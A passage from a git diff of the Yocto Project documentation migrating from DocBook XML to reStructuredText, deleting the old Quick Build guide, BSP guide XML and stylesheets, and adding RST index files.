+ with the Yocto Project, release information, project planning, and QA
+ information.
+
+- **Yocto Project Mailing Lists:** Related mailing lists provide a forum
+ for discussion, patch submission and announcements. Several mailing
+ lists exist and are grouped according to areas of concern. See the
+ :ref:`ref-manual/resources:mailing lists`
+ section in the Yocto Project Reference Manual for a complete list of
+ Yocto Project mailing lists.
+
+- **Comprehensive List of Links and Other Documentation:** The
+ :ref:`ref-manual/resources:links and related documentation`
+ section in the Yocto Project Reference Manual provides a
+ comprehensive list of all related links and other user documentation.
+
+.. include:: /boilerplate.rst
diff --git a/documentation/brief-yoctoprojectqs/brief-yoctoprojectqs.xml b/documentation/brief-yoctoprojectqs/brief-yoctoprojectqs.xml
deleted file mode 100644
index 3c83afd46b..0000000000
--- a/documentation/brief-yoctoprojectqs/brief-yoctoprojectqs.xml
+++ /dev/null
@@ -1,576 +0,0 @@
-<!DOCTYPE article PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<article id='brief-yocto-project-qs-intro'>
- <articleinfo>
- <title>Yocto Project Quick Build</title>
-
- <copyright>
- <year>&COPYRIGHT_YEAR;</year>
- <holder>Linux Foundation</holder>
- </copyright>
-
- <legalnotice>
- <para>
- Permission is granted to copy, distribute and/or modify this document under
- the terms of the <ulink type="http" url="http://creativecommons.org/licenses/by-sa/2.0/uk/">Creative Commons Attribution-Share Alike 2.0 UK: England &amp; Wales</ulink> as published by Creative Commons.
- </para>
- </legalnotice>
-
-
- <abstract>
- <imagedata fileref="figures/yocto-project-transp.png"
- width="6in" depth="1in"
- align="right" scale="25" />
- </abstract>
- </articleinfo>
-
- <section id='brief-welcome'>
- <title>Welcome!</title>
-
- <para>
- Welcome!
- This short document steps you through the process for a typical
- image build using the Yocto Project.
- The document also introduces how to configure a build for specific
- hardware.
- You will use Yocto Project to build a reference embedded OS
- called Poky.
- <note><title>Notes</title>
- <itemizedlist>
- <listitem><para>
- The examples in this paper assume you are using a
- native Linux system running a recent Ubuntu Linux
- distribution.
- If the machine you want to use Yocto Project on to
- build an image
- (<ulink url='&YOCTO_DOCS_REF_URL;#hardware-build-system-term'>build host</ulink>)
- is not a native Linux system, you can
- still perform these steps by using CROss PlatformS
- (CROPS) and setting up a Poky container.
- See the
- <ulink url='&YOCTO_DOCS_DEV_URL;#setting-up-to-use-crops'>Setting Up to Use CROss PlatformS (CROPS)</ulink>"
- section in the Yocto Project Development Tasks Manual for more
- information.
- </para></listitem>
- <listitem><para>
- You may use Windows Subsystem For Linux v2 to set up a build
- host using Windows 10.
- <note>
- The Yocto Project is not compatible with WSLv1, it is
- compatible but not officially supported nor validated
- with WSLv2, if you still decide to use WSL please upgrade
- to WSLv2.
- </note>
- See the
- <ulink url='&YOCTO_DOCS_DEV_URL;#setting-up-to-use-wsl'>Setting Up to Use Windows Subsystem For Linux</ulink>"
- section in the Yocto Project Development Tasks Manual for more
- information.
- </para></listitem>
- </itemizedlist>
- </note>
- </para>
-
- <para>
- If you want more conceptual or background information on the
- Yocto Project, see the
- <ulink url='&YOCTO_DOCS_OM_URL;'>Yocto Project Overview and Concepts Manual</ulink>.
- </para>
- </section>
-
- <section id='brief-compatible-distro'>
- <title>Compatible Linux Distribution</title>
-
- <para>
- Make sure your
- <ulink url='&YOCTO_DOCS_REF_URL;#hardware-build-system-term'>build host</ulink>
- meets the following requirements:
- <itemizedlist>
- <listitem><para>
- 50 Gbytes of free disk space
- </para></listitem>
- <listitem><para>
- Runs a supported Linux distribution (i.e. recent releases of
- Fedora, openSUSE, CentOS, Debian, or Ubuntu). For a list of
- Linux distributions that support the Yocto Project, see the
- "<ulink url='&YOCTO_DOCS_REF_URL;#detailed-supported-distros'>Supported Linux Distributions</ulink>"
- section in the Yocto Project Reference Manual.
- For detailed information on preparing your build host, see
- the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#dev-preparing-the-build-host'>Preparing the Build Host</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para></listitem>
- <listitem><para>
- <itemizedlist>
- <listitem><para>
- Git 1.8.3.1 or greater
- </para></listitem>
- <listitem><para>
- tar 1.28 or greater
- </para></listitem>
- <listitem><para>
- Python 3.5.0 or greater.
- </para></listitem>
- <listitem><para>
- gcc 5.0 or greater.
- </para></listitem>
- </itemizedlist>
- If your build host does not meet any of these three listed
- version requirements, you can take steps to prepare the
- system so that you can still use the Yocto Project.
- See the
- "<ulink url='&YOCTO_DOCS_REF_URL;#required-git-tar-python-and-gcc-versions'>Required Git, tar, Python and gcc Versions</ulink>"
- section in the Yocto Project Reference Manual for information.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='brief-build-system-packages'>
- <title>Build Host Packages</title>
-
- <para>
- You must install essential host packages on your
- build host.
- The following command installs the host packages based on an
- Ubuntu distribution:
- <note>
- For host package requirements on all supported Linux
- distributions, see the
- "<ulink url='&YOCTO_DOCS_REF_URL;#required-packages-for-the-build-host'>Required Packages for the Build Host</ulink>"
- section in the Yocto Project Reference Manual.
- </note>
- <literallayout class='monospaced'>
- $ sudo apt-get install &UBUNTU_HOST_PACKAGES_ESSENTIAL;
- </literallayout>
- </para>
- </section>
-
- <section id='brief-use-git-to-clone-poky'>
- <title>Use Git to Clone Poky</title>
-
- <para>
- Once you complete the setup instructions for your machine,
- you need to get a copy of the Poky repository on your build
- host.
- Use the following commands to clone the Poky
- repository.
- <literallayout class='monospaced'>
- $ git clone git://git.yoctoproject.org/poky
- Cloning into 'poky'...
- remote: Counting objects: 432160, done.
- remote: Compressing objects: 100% (102056/102056), done.
- remote: Total 432160 (delta 323116), reused 432037 (delta 323000)
- Receiving objects: 100% (432160/432160), 153.81 MiB | 8.54 MiB/s, done.
- Resolving deltas: 100% (323116/323116), done.
- Checking connectivity... done.
- </literallayout>
- Move to the <filename>poky</filename> directory and take a look
- at the tags:
- <literallayout class='monospaced'>
- $ cd poky
- $ git fetch --tags
- $ git tag
- 1.1_M1.final
- 1.1_M1.rc1
- 1.1_M1.rc2
- 1.1_M2.final
- 1.1_M2.rc1
- .
- .
- .
- yocto-2.5
- yocto-2.5.1
- yocto-2.5.2
- yocto-2.6
- yocto-2.6.1
- yocto-2.6.2
- yocto-2.7
- yocto_1.5_M5.rc8
- </literallayout>
- For this example, check out the branch based on the
- &DISTRO_REL_TAG; release:
- <literallayout class='monospaced'>
- $ git checkout tags/&DISTRO_REL_TAG; -b my-&DISTRO_REL_TAG;
- Switched to a new branch 'my-&DISTRO_REL_TAG;'
- </literallayout>
- The previous Git checkout command creates a local branch
- named my-&DISTRO_REL_TAG;. The files available to you in that
- branch exactly match the repository's files in the
- "&DISTRO_NAME_NO_CAP;" development branch at the time of the
- Yocto Project &DISTRO_REL_TAG; release.
- </para>
-
- <para>
- For more options and information about accessing Yocto
- Project related repositories, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#locating-yocto-project-source-files'>Locating Yocto Project Source Files</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
- </section>
-
- <section id='brief-building-your-image'>
- <title>Building Your Image</title>
-
- <para>
- Use the following steps to build your image.
- The build process creates an entire Linux distribution, including
- the toolchain, from source.
- <note>
- <itemizedlist>
- <listitem><para>
- If you are working behind a firewall and your build
- host is not set up for proxies, you could encounter
- problems with the build process when fetching source
- code (e.g. fetcher failures or Git failures).
- </para></listitem>
- <listitem><para>
- If you do not know your proxy settings, consult your
- local network infrastructure resources and get that
- information.
- A good starting point could also be to check your
- web browser settings.
- Finally, you can find more information on the
- "<ulink url='https://wiki.yoctoproject.org/wiki/Working_Behind_a_Network_Proxy'>Working Behind a Network Proxy</ulink>"
- page of the Yocto Project Wiki.
- </para></listitem>
- </itemizedlist>
- </note>
- </para>
-
- <para>
- <orderedlist>
- <listitem><para>
- <emphasis>Initialize the Build Environment:</emphasis>
- From within the <filename>poky</filename> directory, run the
- <ulink url='&YOCTO_DOCS_REF_URL;#structure-core-script'><filename>&OE_INIT_FILE;</filename></ulink>
- environment setup script to define Yocto Project's
- build environment on your build host.
- <literallayout class='monospaced'>
- $ cd ~/poky
- $ source &OE_INIT_FILE;
- You had no conf/local.conf file. This configuration file has therefore been
- created for you with some default values. You may wish to edit it to, for
- example, select a different MACHINE (target hardware). See conf/local.conf
- for more information as common configuration options are commented.
-
- You had no conf/bblayers.conf file. This configuration file has therefore been
- created for you with some default values. To add additional metadata layers
- into your configuration please add entries to conf/bblayers.conf.
-
- The Yocto Project has extensive documentation about OE including a reference
- manual which can be found at:
- http://yoctoproject.org/documentation
-
- For more information about OpenEmbedded see their website:
- http://www.openembedded.org/
-
-
- ### Shell environment set up for builds. ###
-
- You can now run 'bitbake &lt;target&gt;'
-
- Common targets are:
- core-image-minimal
- core-image-sato
- meta-toolchain
- meta-ide-support
-
- You can also run generated qemu images with a command like 'runqemu qemux86-64'
- </literallayout>
- Among other things, the script creates the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>,
- which is <filename>build</filename> in this case
- and is located in the
- <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>.
- After the script runs, your current working directory
- is set to the Build Directory.
- Later, when the build completes, the Build Directory
- contains all the files created during the build.
- </para></listitem>
- <listitem><para id='conf-file-step'>
- <emphasis>Examine Your Local Configuration File:</emphasis>
- When you set up the build environment, a local
- configuration file named
- <filename>local.conf</filename> becomes available in
- a <filename>conf</filename> subdirectory of the
- Build Directory.
- For this example, the defaults are set to build
- for a <filename>qemux86</filename> target, which is
- suitable for emulation.
- The package manager used is set to the RPM package
- manager.
- <tip>
- You can significantly speed up your build and guard
- against fetcher failures by using mirrors.
- To use mirrors, add these lines to your
- <filename>local.conf</filename> file in the Build
- directory:
- <literallayout class='monospaced'>
- SSTATE_MIRRORS = "\
- file://.* http://sstate.yoctoproject.org/dev/PATH;downloadfilename=PATH \n \
- file://.* http://sstate.yoctoproject.org/&YOCTO_DOC_VERSION_MINUS_ONE;/PATH;downloadfilename=PATH \n \
- file://.* http://sstate.yoctoproject.org/&YOCTO_DOC_VERSION;/PATH;downloadfilename=PATH \n \
- "
- </literallayout>
- The previous examples showed how to add sstate
- paths for Yocto Project &YOCTO_DOC_VERSION_MINUS_ONE;,
- &YOCTO_DOC_VERSION;, and a development area.
- For a complete index of sstate locations, see
- <ulink url='http://sstate.yoctoproject.org/'></ulink>.
- </tip>
- </para></listitem>
- <listitem><para>
- <emphasis>Start the Build:</emphasis>
- Continue with the following command to build an OS image
- for the target, which is
- <filename>core-image-sato</filename> in this example:
- <literallayout class='monospaced'>
- $ bitbake core-image-sato
- </literallayout>
- For information on using the
- <filename>bitbake</filename> command, see the
- "<ulink url='&YOCTO_DOCS_OM_URL;#usingpoky-components-bitbake'>BitBake</ulink>"
- section in the Yocto Project Overview and Concepts Manual,
- or see the
- "<ulink url='&YOCTO_DOCS_BB_URL;#bitbake-user-manual-command'>BitBake Command</ulink>"
- section in the BitBake User Manual.
- </para></listitem>
- <listitem><para>
- <emphasis>Simulate Your Image Using QEMU:</emphasis>
- Once this particular image is built, you can start
- QEMU, which is a Quick EMUlator that ships with
- the Yocto Project:
- <literallayout class='monospaced'>
- $ runqemu qemux86-64
- </literallayout>
- If you want to learn more about running QEMU, see the
- "<ulink url="&YOCTO_DOCS_DEV_URL;#dev-manual-qemu">Using the Quick EMUlator (QEMU)</ulink>"
- chapter in the Yocto Project Development Tasks Manual.
- </para></listitem>
- <listitem><para>
- <emphasis>Exit QEMU:</emphasis>
- Exit QEMU by either clicking on the shutdown icon or by
- typing <filename>Ctrl-C</filename> in the QEMU
- transcript window from which you evoked QEMU.
- </para></listitem>
- </orderedlist>
- </para>
- </section>
-
- <section id='customizing-your-build-for-specific-hardware'>
- <title>Customizing Your Build for Specific Hardware</title>
-
- <para>
- So far, all you have done is quickly built an image suitable
- for emulation only.
- This section shows you how to customize your build for specific
- hardware by adding a hardware layer into the Yocto Project
- development environment.
- </para>
-
- <para>
- In general, layers are repositories that contain related sets of
- instructions and configurations that tell the Yocto Project what
- to do.
- Isolating related metadata into functionally specific layers
- facilitates modular development and makes it easier to reuse the
- layer metadata.
- <note>
- By convention, layer names start with the string "meta-".
- </note>
- </para>
-
- <para>
- Follow these steps to add a hardware layer:
- <orderedlist>
- <listitem><para>
- <emphasis>Find a Layer:</emphasis>
- Lots of hardware layers exist.
- The Yocto Project
- <ulink url='&YOCTO_GIT_URL;'>Source Repositories</ulink>
- has many hardware layers.
- This example adds the
- <ulink url='https://github.com/kraj/meta-altera'>meta-altera</ulink>
- hardware layer.
- </para></listitem>
- <listitem><para>
- <emphasis>Clone the Layer</emphasis>
- Use Git to make a local copy of the layer on your machine.
- You can put the copy in the top level of the copy of the
- Poky repository created earlier:
- <literallayout class='monospaced'>
- $ cd ~/poky
- $ git clone https://github.com/kraj/meta-altera.git
- Cloning into 'meta-altera'...
- remote: Counting objects: 25170, done.
- remote: Compressing objects: 100% (350/350), done.
- remote: Total 25170 (delta 645), reused 719 (delta 538), pack-reused 24219
- Receiving objects: 100% (25170/25170), 41.02 MiB | 1.64 MiB/s, done.
- Resolving deltas: 100% (13385/13385), done.
- Checking connectivity... done.
- </literallayout>
- The hardware layer now exists with other layers inside
- the Poky reference repository on your build host as
- <filename>meta-altera</filename> and contains all the
- metadata needed to support hardware from Altera, which
- is owned by Intel.
- </para></listitem>
- <listitem><para>
- <emphasis>Change the Configuration to Build for a Specific Machine:</emphasis>
- The
- <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE'><filename>MACHINE</filename></ulink>
- variable in the <filename>local.conf</filename> file
- specifies the machine for the build.
- For this example, set the <filename>MACHINE</filename>
- variable to "cyclone5".
- These configurations are used:
- <ulink url='https://github.com/kraj/meta-altera/blob/master/conf/machine/cyclone5.conf'></ulink>.
- <note>
- See the
- "<link linkend='conf-file-step'>Examine Your Local Configuration File</link>"
- step earlier for more information on configuring the
- build.
- </note>
- </para></listitem>
- <listitem><para>
- <emphasis>Add Your Layer to the Layer Configuration File:</emphasis>
- Before you can use a layer during a build, you must add it
- to your <filename>bblayers.conf</filename> file, which
- is found in the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory's</ulink>
- <filename>conf</filename> directory.</para>
-
- <para>Use the <filename>bitbake-layers add-layer</filename>
- command to add the layer to the configuration file:
- <literallayout class='monospaced'>
- $ cd ~/poky/build
- $ bitbake-layers add-layer ../meta-altera
- NOTE: Starting bitbake server...
- Parsing recipes: 100% |##################################################################| Time: 0:00:32
- Parsing of 918 .bb files complete (0 cached, 918 parsed). 1401 targets, 123 skipped, 0 masked, 0 errors.
- </literallayout>
- You can find more information on adding layers in the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#adding-a-layer-using-the-bitbake-layers-script'>Adding a Layer Using the <filename>bitbake-layers</filename> Script</ulink>"
- section.
- </para></listitem>
- </orderedlist>
- Completing these steps has added the
- <filename>meta-altera</filename> layer to your Yocto Project
- development environment and configured it to build for the
- "cyclone5" machine.
- <note>
- The previous steps are for demonstration purposes only.
- If you were to attempt to build an image for the
- "cyclone5" build, you should read the Altera
- <filename>README</filename>.
- </note>
- </para>
- </section>
-
- <section id='creating-your-own-general-layer'>
- <title>Creating Your Own General Layer</title>
-
- <para>
- Maybe you have an application or specific set of behaviors you
- need to isolate.
- You can create your own general layer using the
- <filename>bitbake-layers create-layer</filename> command.
- The tool automates layer creation by setting up a
- subdirectory with a <filename>layer.conf</filename>
- configuration file, a <filename>recipes-example</filename>
- subdirectory that contains an <filename>example.bb</filename>
- recipe, a licensing file, and a <filename>README</filename>.
- </para>
-
- <para>
- The following commands run the tool to create a layer named
- <filename>meta-mylayer</filename> in the
- <filename>poky</filename> directory:
- <literallayout class='monospaced'>
- $ cd ~/poky
- $ bitbake-layers create-layer meta-mylayer
- NOTE: Starting bitbake server...
- Add your new layer with 'bitbake-layers add-layer meta-mylayer'
- </literallayout>
- For more information on layers and how to create them, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#creating-a-general-layer-using-the-bitbake-layers-script'>Creating a General Layer Using the <filename>bitbake-layers</filename> Script</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
- </section>
-
- <section id='brief-where-to-go-next'>
- <title>Where To Go Next</title>
-
- <para>
- Now that you have experienced using the Yocto Project, you might
- be asking yourself "What now?"
- The Yocto Project has many sources of information including
- the website, wiki pages, and user manuals:
- <itemizedlist>
- <listitem><para>
- <emphasis>Website:</emphasis>
- The
- <ulink url='&YOCTO_HOME_URL;'>Yocto Project Website</ulink>
- provides background information, the latest builds,
- breaking news, full development documentation, and
- access to a rich Yocto Project Development Community
- into which you can tap.
- </para></listitem>
- <listitem><para>
- <emphasis>Developer Screencast:</emphasis>
- The
- <ulink url='http://vimeo.com/36450321'>Getting Started with the Yocto Project - New Developer Screencast Tutorial</ulink>
- provides a 30-minute video created for users unfamiliar
- with the Yocto Project but familiar with Linux build
- hosts.
- While this screencast is somewhat dated, the
- introductory and fundamental concepts are useful for
- the beginner.
- </para></listitem>
- <listitem><para>
- <emphasis>Yocto Project Overview and Concepts Manual:</emphasis>
- The
- <ulink url='&YOCTO_DOCS_OM_URL;'>Yocto Project Overview and Concepts Manual</ulink>
- is a great place to start to learn about the
- Yocto Project.
- This manual introduces you to the Yocto Project and its
- development environment.
- The manual also provides conceptual information for
- various aspects of the Yocto Project.
- </para></listitem>
- <listitem><para>
- <emphasis>Yocto Project Wiki:</emphasis>
- The
- <ulink url='&YOCTO_WIKI_URL;'>Yocto Project Wiki</ulink>
- provides additional information on where to go next
- when ramping up with the Yocto Project, release
- information, project planning, and QA information.
- </para></listitem>
- <listitem><para>
- <emphasis>Yocto Project Mailing Lists:</emphasis>
- Related mailing lists provide a forum for discussion,
- patch submission and announcements.
- Several mailing lists exist and are grouped according
- to areas of concern.
- See the
- "<ulink url='&YOCTO_DOCS_REF_URL;#resources-mailinglist'>Mailing lists</ulink>"
- section in the Yocto Project Reference Manual for a
- complete list of Yocto Project mailing lists.
- </para></listitem>
- <listitem><para>
- <emphasis>Comprehensive List of Links and Other Documentation:</emphasis>
- The
- "<ulink url='&YOCTO_DOCS_REF_URL;#resources-links-and-related-documentation'>Links and Related Documentation</ulink>"
- section in the Yocto Project Reference Manual provides a
- comprehensive list of all related links and other
- user documentation.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-</article>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/bsp-guide/bsp-guide-customization.xsl b/documentation/bsp-guide/bsp-guide-customization.xsl
deleted file mode 100644
index de674a0aec..0000000000
--- a/documentation/bsp-guide/bsp-guide-customization.xsl
+++ /dev/null
@@ -1,27 +0,0 @@
-<?xml version='1.0'?>
-<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns="http://www.w3.org/1999/xhtml" xmlns:fo="http://www.w3.org/1999/XSL/Format" version="1.0">
-
- <xsl:import href="http://downloads.yoctoproject.org/mirror/docbook-mirror/docbook-xsl-1.76.1/xhtml/docbook.xsl" />
-
-<!--
-
- <xsl:import href="../template/1.76.1/docbook-xsl-1.76.1/xhtml/docbook.xsl" />
-
- <xsl:import href="http://docbook.sourceforge.net/release/xsl/1.76.1/xhtml/docbook.xsl" />
-
--->
-
- <xsl:include href="../template/permalinks.xsl"/>
- <xsl:include href="../template/section.title.xsl"/>
- <xsl:include href="../template/component.title.xsl"/>
- <xsl:include href="../template/division.title.xsl"/>
- <xsl:include href="../template/formal.object.heading.xsl"/>
-
- <xsl:param name="html.stylesheet" select="'bsp-style.css'" />
- <xsl:param name="chapter.autolabel" select="1" />
- <xsl:param name="appendix.autolabel" select="A" />
- <xsl:param name="section.autolabel" select="1" />
- <xsl:param name="section.label.includes.component.label" select="1" />
- <xsl:param name="generate.id.attributes" select="1" />
-
-</xsl:stylesheet>
diff --git a/documentation/bsp-guide/bsp-guide.rst b/documentation/bsp-guide/bsp-guide.rst
new file mode 100644
index 0000000000..a4394a85ed
--- /dev/null
+++ b/documentation/bsp-guide/bsp-guide.rst
@@ -0,0 +1,16 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+=====================================================
+Yocto Project Board Support Package Developer's Guide
+=====================================================
+
+|
+
+.. toctree::
+ :caption: Table of Contents
+ :numbered:
+
+ bsp
+ history
+
+.. include:: /boilerplate.rst
diff --git a/documentation/bsp-guide/bsp-guide.xml b/documentation/bsp-guide/bsp-guide.xml
deleted file mode 100755
index eec048e021..0000000000
--- a/documentation/bsp-guide/bsp-guide.xml
+++ /dev/null
@@ -1,221 +0,0 @@
-<!DOCTYPE book PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<book id='bsp-guide' lang='en'
- xmlns:xi="http://www.w3.org/2003/XInclude"
- xmlns="http://docbook.org/ns/docbook"
- >
- <bookinfo>
-
- <mediaobject>
- <imageobject>
- <imagedata fileref='figures/bsp-title.png'
- format='SVG'
- align='center' scalefit='1' width='100%'/>
- </imageobject>
- </mediaobject>
-
- <title>
- Yocto Project Board Support Package Developer's Guide
- </title>
-
- <authorgroup>
- <author>
- <affiliation>
- <orgname>&ORGNAME;</orgname>
- </affiliation>
- <email>&ORGEMAIL;</email>
- </author>
- </authorgroup>
-
- <revhistory>
- <revision>
- <revnumber>0.9</revnumber>
- <date>November 2010</date>
- <revremark>The initial document released with the Yocto Project 0.9 Release.</revremark>
- </revision>
- <revision>
- <revnumber>1.0</revnumber>
- <date>April 2011</date>
- <revremark>Released with the Yocto Project 1.0 Release.</revremark>
- </revision>
- <revision>
- <revnumber>1.1</revnumber>
- <date>October 2011</date>
- <revremark>Released with the Yocto Project 1.1 Release.</revremark>
- </revision>
- <revision>
- <revnumber>1.2</revnumber>
- <date>April 2012</date>
- <revremark>Released with the Yocto Project 1.2 Release.</revremark>
- </revision>
- <revision>
- <revnumber>1.3</revnumber>
- <date>October 2012</date>
- <revremark>Released with the Yocto Project 1.3 Release.</revremark>
- </revision>
- <revision>
- <revnumber>1.4</revnumber>
- <date>April 2013</date>
- <revremark>Released with the Yocto Project 1.4 Release.</revremark>
- </revision>
- <revision>
- <revnumber>1.5</revnumber>
- <date>October 2013</date>
- <revremark>Released with the Yocto Project 1.5 Release.</revremark>
- </revision>
- <revision>
- <revnumber>1.6</revnumber>
- <date>April 2014</date>
- <revremark>Released with the Yocto Project 1.6 Release.</revremark>
- </revision>
- <revision>
- <revnumber>1.7</revnumber>
- <date>October 2014</date>
- <revremark>Released with the Yocto Project 1.7 Release.</revremark>
- </revision>
- <revision>
- <revnumber>1.8</revnumber>
- <date>April 2015</date>
- <revremark>Released with the Yocto Project 1.8 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.0</revnumber>
- <date>October 2015</date>
- <revremark>Released with the Yocto Project 2.0 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.1</revnumber>
- <date>April 2016</date>
- <revremark>Released with the Yocto Project 2.1 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.2</revnumber>
- <date>October 2016</date>
- <revremark>Released with the Yocto Project 2.2 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.3</revnumber>
- <date>May 2017</date>
- <revremark>Released with the Yocto Project 2.3 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.4</revnumber>
- <date>October 2017</date>
- <revremark>Released with the Yocto Project 2.4 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.5</revnumber>
- <date>May 2018</date>
- <revremark>Released with the Yocto Project 2.5 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.6</revnumber>
- <date>November 2018</date>
- <revremark>Released with the Yocto Project 2.6 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.7</revnumber>
- <date>May 2019</date>
- <revremark>Released with the Yocto Project 2.7 Release.</revremark>
- </revision>
- <revision>
- <revnumber>3.0</revnumber>
- <date>October 2019</date>
- <revremark>Released with the Yocto Project 3.0 Release.</revremark>
- </revision>
- <revision>
- <revnumber>3.1</revnumber>
- <date>April 2020</date>
- <revremark>Released with the Yocto Project 3.1 Release.</revremark>
- </revision>
- <revision>
- <revnumber>3.1.1</revnumber>
- <date>June 2020</date>
- <revremark>Released with the Yocto Project 3.1.1 Release.</revremark>
- </revision>
- <revision>
- <revnumber>3.1.2</revnumber>
- <date>August 2020</date>
- <revremark>Released with the Yocto Project 3.1.2 Release.</revremark>
- </revision>
- <revision>
- <revnumber>3.1.3</revnumber>
- <date>October 2020</date>
- <revremark>Released with the Yocto Project 3.1.3 Release.</revremark>
- </revision>
- <revision>
- <revnumber>3.1.4</revnumber>
- <date>&REL_MONTH_YEAR;</date>
- <revremark>Released with the Yocto Project 3.1.4 Release.</revremark>
- </revision>
- </revhistory>
-
- <copyright>
- <year>&COPYRIGHT_YEAR;</year>
- <holder>Linux Foundation</holder>
- </copyright>
-
- <legalnotice>
- <para>
- Permission is granted to copy, distribute and/or modify this document under
- the terms of the <ulink type="http" url="http://creativecommons.org/licenses/by-nc-sa/2.0/uk/">Creative Commons Attribution-Share Alike 2.0 UK: England &amp; Wales</ulink> as published by Creative Commons.
- </para>
- <note><title>Manual Notes</title>
- <itemizedlist>
- <listitem><para>
- This version of the
- <emphasis>Yocto Project Board Support Package (BSP) Developer's Guide</emphasis>
- is for the &YOCTO_DOC_VERSION; release of the
- Yocto Project.
- To be sure you have the latest version of the manual
- for this release, go to the
- <ulink url='&YOCTO_DOCS_URL;'>Yocto Project documentation page</ulink>
- and select the manual from that site.
- Manuals from the site are more up-to-date than manuals
- derived from the Yocto Project released TAR files.
- </para></listitem>
- <listitem><para>
- If you located this manual through a web search, the
- version of the manual might not be the one you want
- (e.g. the search might have returned a manual much
- older than the Yocto Project version with which you
- are working).
- You can see all Yocto Project major releases by
- visiting the
- <ulink url='&YOCTO_WIKI_URL;/wiki/Releases'>Releases</ulink>
- page.
- If you need a version of this manual for a different
- Yocto Project release, visit the
- <ulink url='&YOCTO_DOCS_URL;'>Yocto Project documentation page</ulink>
- and select the manual set by using the
- "ACTIVE RELEASES DOCUMENTATION" or "DOCUMENTS ARCHIVE"
- pull-down menus.
- </para></listitem>
- <listitem>
- <para>
- To report any inaccuracies or problems with this
- (or any other Yocto Project) manual, send an email to
- the Yocto Project documentation mailing list at
- <filename>docs@lists.yoctoproject.org</filename> or
- log into the freenode <filename>#yocto</filename> channel.
- </para>
- </listitem>
- </itemizedlist>
- </note>
- </legalnotice>
-
- </bookinfo>
-
- <xi:include href="bsp.xml"/>
-
-<!-- <index id='index'>
- <title>Index</title>
- </index>
--->
-
-</book>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/bsp-guide/bsp-style.css b/documentation/bsp-guide/bsp-style.css
deleted file mode 100644
index 0c8689b96f..0000000000
--- a/documentation/bsp-guide/bsp-style.css
+++ /dev/null
@@ -1,987 +0,0 @@
-/*
- Generic XHTML / DocBook XHTML CSS Stylesheet.
-
- Browser wrangling and typographic design by
- Oyvind Kolas / pippin@gimp.org
-
- Customised for Poky by
- Matthew Allum / mallum@o-hand.com
-
- Thanks to:
- Liam R. E. Quin
- William Skaggs
- Jakub Steiner
-
- Structure
- ---------
-
- The stylesheet is divided into the following sections:
-
- Positioning
- Margins, paddings, width, font-size, clearing.
- Decorations
- Borders, style
- Colors
- Colors
- Graphics
- Graphical backgrounds
- Nasty IE tweaks
- Workarounds needed to make it work in internet explorer,
- currently makes the stylesheet non validating, but up until
- this point it is validating.
- Mozilla extensions
- Transparency for footer
- Rounded corners on boxes
-
-*/
-
-
- /*************** /
- / Positioning /
-/ ***************/
-
-body {
- font-family: Verdana, Sans, sans-serif;
-
- min-width: 640px;
- width: 80%;
- margin: 0em auto;
- padding: 2em 5em 5em 5em;
- color: #333;
-}
-
-h1,h2,h3,h4,h5,h6,h7 {
- font-family: Arial, Sans;
- color: #00557D;
- clear: both;
-}
-
-h1 {
- font-size: 2em;
- text-align: left;
- padding: 0em 0em 0em 0em;
- margin: 2em 0em 0em 0em;
-}
-
-h2.subtitle {
- margin: 0.10em 0em 3.0em 0em;
- padding: 0em 0em 0em 0em;
- font-size: 1.8em;
- padding-left: 20%;
- font-weight: normal;
- font-style: italic;
-}
-
-h2 {
- margin: 2em 0em 0.66em 0em;
- padding: 0.5em 0em 0em 0em;
- font-size: 1.5em;
- font-weight: bold;
-}
-
-h3.subtitle {
- margin: 0em 0em 1em 0em;
- padding: 0em 0em 0em 0em;
- font-size: 142.14%;
- text-align: right;
-}
-
-h3 {
- margin: 1em 0em 0.5em 0em;
- padding: 1em 0em 0em 0em;
- font-size: 140%;
- font-weight: bold;
-}
-
-h4 {
- margin: 1em 0em 0.5em 0em;
- padding: 1em 0em 0em 0em;
- font-size: 120%;
- font-weight: bold;
-}
-
-h5 {
- margin: 1em 0em 0.5em 0em;
- padding: 1em 0em 0em 0em;
- font-size: 110%;
- font-weight: bold;
-}
-
-h6 {
- margin: 1em 0em 0em 0em;
- padding: 1em 0em 0em 0em;
- font-size: 110%;
- font-weight: bold;
-}
-
-.authorgroup {
- background-color: transparent;
- background-repeat: no-repeat;
- padding-top: 256px;
- background-image: url("figures/bsp-title.png");
- background-position: left top;
- margin-top: -256px;
- padding-right: 50px;
- margin-left: 0px;
- text-align: right;
- width: 740px;
-}
-
-h3.author {
- margin: 0em 0me 0em 0em;
- padding: 0em 0em 0em 0em;
- font-weight: normal;
- font-size: 100%;
- color: #333;
- clear: both;
-}
-
-.author tt.email {
- font-size: 66%;
-}
-
-.titlepage hr {
- width: 0em;
